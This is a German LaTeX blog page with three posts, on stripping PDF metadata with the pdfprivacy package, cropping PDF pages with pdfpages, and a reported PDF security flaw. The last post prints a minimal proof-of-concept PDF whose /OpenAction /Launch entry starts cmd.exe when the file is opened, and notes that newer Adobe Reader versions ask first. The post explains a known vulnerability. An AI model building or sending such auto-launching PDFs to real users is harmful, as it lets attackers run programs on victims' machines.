Posts tagged ‘PDF’

PDFs anonymisieren mit dem pdfprivacy Paket

pdflatex packt einiges an Meta-Daten in eine PDF-Datei:

Mit dem pdfprivacy (http://mirror.ctan.org/macros/latex/contrib/pdfprivacy) Paket von Laurens Sion lassen sich diese Informationen unterdrücken.

Aus der Dokumentation:

„Creating pdfs with pdfLATEX populates several pdf meta-data fields such as date/time of creation/modification, information about the latex instal-
lation (e.g., pdfTEX version), and the relative paths of included pdfs. The pdfprivacy package provides support for emptying several of these pdf meta-
data fields as well as suppressing some pdfTEX meta-data entries in the resulting pdf.“

Die Optionen stehen dabei für:

nodocdata
Specify whether document meta-data should be removed from the PDF. Document meta-data includes: (i) Title, (ii) Subject, (iii) Author, and (iv) Keywords.
noproducerdata
Specify whether meta-data on the PDF-producing application should be removed. This includes: (i) Creator, and (ii) Producer.
noeditdata
Specify whether meta-data on the edit and creation dates should be removed. This includes: (i) creation date, and (ii) modification date.
noptexdata
Specify whether the PTEX meta-data entries should be suppressed. This includes: (i) PTEX.Fullbanner, (ii) PTEX.FileName, (iii) PTEX.PageNumber, and (iv) PTEX.InfoDict.
nopdftrailerid
Specify whether the pdfrailerid should be omitted.

Diese letzte Option zur pdftrailerid sagt mir nichts, die anderen Optionen sind sicherlich selbsterklärend. Hier ein Beispiel:

\documentclass[12pt,ngerman]{scrartcl}
 
\usepackage[utf8]{inputenc}
\usepackage[T1]{fontenc}
\usepackage{booktabs}
\usepackage{babel}
\usepackage{graphicx}
\usepackage{csquotes}
\usepackage{paralist}
\usepackage{xcolor}
 
\usepackage[nodocdata=false,noeditdata=true,noproducerdata=true,noptexdata=true,nopdftrailerid=false]{pdfprivacy}
 
\begin{document}
 
Hallo Welt!
 
\end{document}

Uwe

Uwe Ziegenhagen mag LaTeX und Python, auch gern in Kombination.

Hat Dir dieser Beitrag geholfen und möchtest Du Dich dafür bedanken? Dann unterstütze doch vielleicht die Dingfabrik Köln e.V. mit einem kleinen Beitrag. Details zur Bezahlung findest Du unter Spenden für die Dingfabrik.

More Posts - Website

Schnittmarken mit LaTeX entfernen

Vor ein paar Tagen wollte ich die Schnittmarken in einer PDF Datei entfernen. Da ich kein Adobe Acrobat oder einen ähnlichen PDF Editor habe, habe ich LaTeX genutzt. Nützlich ist die Fähigkeit des pdfpages Pakets, direkt beim Import eines PDF festzulegen, wie jede Seite zu croppen ist. Der trim Parameter bekommt dabei vier Maße übergeben, die für links unten rechts oben (left bottom right top) stehen.

\documentclass{scrartcl}
\usepackage{pdfpages}
\begin{document}
 
\includepdf[scale=1,pages=1-48,clip,trim=50mm 55mm 45mm 55mm]{Booklet.pdf}
 
\end{document}

Uwe

Uwe Ziegenhagen mag LaTeX und Python, auch gern in Kombination.

Hat Dir dieser Beitrag geholfen und möchtest Du Dich dafür bedanken? Dann unterstütze doch vielleicht die Dingfabrik Köln e.V. mit einem kleinen Beitrag. Details zur Bezahlung findest Du unter Spenden für die Dingfabrik.

More Posts - Website

Sicherheitslücken in PDF

Das eine PDF-Datei mehr enthalten kann als nur Buchstaben und Bilder ist sicher einigen bekannt, als pdfTeXniker nutze ich gern Funktionen wie Javescript oder die Möglichkeiten zur Einbettung von Dateien im PDF Container. Vor ein paar Wochen hat Heise über eine Sicherheitslücke berichtet, die aus PDF Dateien andere ausführbare Dateien aufruft: http://www.heise.de/security/meldung/PDF-Exploit-funktioniert-ohne-konkrete-Sicherheitsluecke-968031.html. Im Forum zu diesem Artikel gab es das folgende Minimalbeispiel (in eine Datei packen und mit der Endung .PDF abspeichern):

%PDF-1.1

1 0 obj
<<
 /Pages 8 0 R
 /OpenAction 8 0 R
>>
endobj

8 0 obj
<<
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
 >>
>>
endobj

trailer
<<
 /Root 1 0 R
>>

%%EOF

Meines Erachtens ist die Lücke gefixt, im Adobe Reader 9.3.2 kommt zumindest eine Nachfrage, ob man die Datei starten möchte.

Uwe

Uwe Ziegenhagen mag LaTeX und Python, auch gern in Kombination.

Hat Dir dieser Beitrag geholfen und möchtest Du Dich dafür bedanken? Dann unterstütze doch vielleicht die Dingfabrik Köln e.V. mit einem kleinen Beitrag. Details zur Bezahlung findest Du unter Spenden für die Dingfabrik.

More Posts - Website